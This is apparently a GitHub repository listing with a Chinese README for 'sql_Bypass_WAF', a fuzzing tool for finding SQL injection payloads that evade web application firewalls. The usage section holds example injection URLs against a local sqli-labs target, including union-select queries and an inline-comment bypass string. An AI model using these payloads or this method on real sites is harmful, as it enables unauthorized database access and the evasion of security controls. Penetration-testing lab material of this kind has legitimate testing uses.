├── images ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── 7.png └── 8.png └── README.md /images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ShyTangerine/sql_Bypass_WAF/HEAD/images/1.png -------------------------------------------------------------------------------- /images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ShyTangerine/sql_Bypass_WAF/HEAD/images/2.png -------------------------------------------------------------------------------- /images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ShyTangerine/sql_Bypass_WAF/HEAD/images/3.png -------------------------------------------------------------------------------- /images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ShyTangerine/sql_Bypass_WAF/HEAD/images/4.png -------------------------------------------------------------------------------- /images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ShyTangerine/sql_Bypass_WAF/HEAD/images/5.png -------------------------------------------------------------------------------- /images/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ShyTangerine/sql_Bypass_WAF/HEAD/images/6.png -------------------------------------------------------------------------------- /images/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ShyTangerine/sql_Bypass_WAF/HEAD/images/7.png -------------------------------------------------------------------------------- /images/8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ShyTangerine/sql_Bypass_WAF/HEAD/images/8.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # sql_Bypass_WAF 2 | sql注入bypass waf工具,绕waf fuzz测试工具。 3 | 4 | ## 简介 5 | 6 | sql_Bypass_WAF是一款sql注入绕waf工具,通过fuzz的方式,进行大量测试找到bypass语句。 7 | 8 | 9 | ## 整体流程 10 | 11 | 1. 半自动,需要人工判断拦截关键字并指定关键字进行fuzz测试。 12 | 2. 首先先访问一下waf拦截页面,获取拦截页面特征,如响应码、响应内容长度、body中关键字。 13 | 3. 进行fuzz测试,如果响应与之前的拦截响应有多处不同,证明成功绕过。 14 | 15 | 16 | ## Bypass方法 17 | 18 | 已实现Bypass方法: 19 | 内联注释 20 | 21 | 后续会更新更多的Bypass方法。 22 | 23 | 24 | 25 | ## 使用方法 26 | 27 | 1. -h查看参数帮助 28 | 29 | ![](./images/8.png) 30 | 31 | 32 | 2. 先判断出waf拦截的sql恶意语句。 33 | 34 | ![](./images/1.png) 35 | 36 | 3. 再将想要Bypass的语句带入到工具中,注意带入到工具中的url为waf拦截的url。 37 | 38 | 如果bypass一个参数,用"~"进行包裹,如 39 | ``` 40 | http://192.168.170.133/sqli/less-1/?id=1' and 1=1 --+ 41 | 将"and"用~包裹后: 42 | http://192.168.170.133/sqli/less-1/?id=1' ~and~ 1=1 --+ 43 | ``` 44 | 45 | 命令示例: 46 | ``` 47 | sql_Bypass_WAF.exe -s "http://192.168.170.133/sqli/less-1/?id=1' ~and~ 1=1 --+" 48 | ``` 49 | 50 | ![](./images/2.png) 51 | 52 | 53 | ![](./images/3.png) 54 | 55 | 如果为两个参数,在两个参数中间加"^",如 56 | ``` 57 | http://192.168.170.133/sqli/less-1/?id=1' order by 1 --+ 58 | 将"order by"用^指定 59 | http://192.168.170.133/sqli/less-1/?id=1' order^by 1 --+ 60 | ``` 61 | 62 | 命令示例: 63 | ``` 64 | sql_Bypass_WAF.exe -s "http://192.168.170.133/sqli/less-1/?id=1' order^by 1 --+" 65 | ``` 66 | 67 | 68 | ![](./images/4.png) 69 | 70 | ![](./images/5.png) 71 | 72 | 暂不支持超过两个参数的fuzz,但可以拆分依次带入测试,如: 73 | 74 | ``` 75 | 测试语句: 76 | http://192.168.170.133/sqli/less-1/?id=-1' union select 1,database(),3 --+ 77 | 78 | 先bypass"union select" 79 | http://192.168.170.133/sqli/less-1/?id=-1' union^select 1,2,3 --+ 80 | bypass后语句: 81 | http://192.168.170.133/sqli/less-1/?id=-1' union/*////%//select 1,2,3 --+ 82 | 83 | 再bypass"database()" 84 | http://192.168.170.133/sqli/less-1/?id=-1' union/*////%//select 1,database^(),3 --+ 85 | 86 | ``` 87 | 88 | ![](./images/6.png) 89 | 90 | ![](./images/7.png) 91 | 92 | 93 | 94 | ## 后续更新功能 95 | 96 | 1. post请求Bypass。 97 | 2. waf识别。 98 | 3. Bypass成功后自动生成tamper脚本。 99 | 4. 更多的Bypass方法。 100 | --------------------------------------------------------------------------------